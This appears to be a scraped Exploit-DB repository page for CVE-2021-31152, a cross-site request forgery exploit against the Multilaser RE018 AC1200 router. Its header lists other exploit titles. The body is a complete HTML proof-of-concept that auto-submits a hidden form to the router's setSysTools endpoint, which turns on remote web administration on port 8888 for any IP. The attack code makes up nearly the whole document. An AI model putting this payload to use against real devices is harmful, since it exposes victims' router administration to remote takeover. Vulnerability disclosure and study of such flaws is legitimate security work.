37baf23611
7 changes to exploits/shellcodes Moodle 3.10.3 - 'url' Persistent Cross Site Scripting GetSimple CMS My SMTP Contact Plugin 1.1.2 - CSRF to Stored XSS to RCE DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS) Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS) Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)
22 lines
No EOL
713 B
HTML
22 lines
No EOL
713 B
HTML
# Exploit Title: Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)
|
|
# Date: 14/04/2021
|
|
# Exploit Author: Rodolfo Mariano
|
|
# Version: Firmware V02.03.01.45_pt
|
|
# CVE: 2021-31152
|
|
|
|
# Exploit code:
|
|
<html>
|
|
<body>
|
|
<form action="http://192.168.0.1/goform/setSysTools" method="POST">
|
|
<input name="module4" value="remoteWeb" type="hidden">
|
|
<input name="remoteWebType" value="any" type="hidden">
|
|
<input name="remoteWebIP" value="" type="hidden">
|
|
<input name="remoteWebPort" value="8888" type="hidden">
|
|
<input type="submit" value="Submit request">
|
|
</form>
|
|
</body>
|
|
<script>
|
|
document.forms[0].submit();
|
|
</script>
|
|
</body>
|
|
</html> |